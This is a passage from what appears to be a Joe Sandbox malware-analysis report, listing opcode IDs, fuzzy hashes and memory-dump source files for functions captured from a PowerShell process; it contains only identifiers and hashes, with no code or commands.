                • Opcode ID: 0fffdd0e7e8186702ce9fc13597c0cdcefc4ae7a3f38d0dcba25e18e53fc761b
                • Instruction ID: ba353a1e068ac29810238644e50551e28cbf6b90844ebca9f614f589af57723e
                • Opcode Fuzzy Hash: 0fffdd0e7e8186702ce9fc13597c0cdcefc4ae7a3f38d0dcba25e18e53fc761b
                • Instruction Fuzzy Hash: E8414875A002059FCB15DF89C594EBAFBB1FF48310B158599D815AB3A4C736FC91CBA0
                Memory Dump Source
                • Source File: 00000013.00000002.2558817347.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_76c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 49861c2ef047475f216ce9d5d8cdff0811cf9fcda6f0a25bfba90d01b6db3bee
                • Instruction ID: 2aca2aae6c2d2f8bda7bc067015abbedafb3bc89e0e590e22baa54f70d63ed2d
                • Opcode Fuzzy Hash: 49861c2ef047475f216ce9d5d8cdff0811cf9fcda6f0a25bfba90d01b6db3bee
                • Instruction Fuzzy Hash: 92318474B10204AFEB14AB64C950BAE7A63EFC4355F148418EA02AF7D5CF76EC46CB91
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c09f9816dd0516f5899bbd2b0492498bd3f02e110f97acc732dc24581d8a3598
                • Instruction ID: 6649bcba5d76d8e6bca237ffeac13fa0449f7e64916e9f26c7372ecece22ffd7
                • Opcode Fuzzy Hash: c09f9816dd0516f5899bbd2b0492498bd3f02e110f97acc732dc24581d8a3598
                • Instruction Fuzzy Hash: 34319570D093959FDB11DF6CC8A099ABFB0EF4A210B05409BD845DF352D635EC45CBA6
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e303df0d1081ffe7915f0a0023a759f7be3695fc164c2fd5a334058cf083bf3a
                • Instruction ID: c5e179f775220451a9d539d620465fd269bcd579298ec790caefb6a164509ae2
                • Opcode Fuzzy Hash: e303df0d1081ffe7915f0a0023a759f7be3695fc164c2fd5a334058cf083bf3a
                • Instruction Fuzzy Hash: 4A215CB4E042599FCB10DF58D8909AAFBB4FF49300B54819AE809EB352D736EC45CBA1
                Memory Dump Source
                • Source File: 00000013.00000002.2544796650.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_4a80000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5940ae39c494d4c62f1e974f389cabc383746132f63da56ff81e4472a3bd9a27
                • Instruction ID: 7d1b444b99c4608d758f030837d9abb291f00b58fa3628421f28c74e3788ec29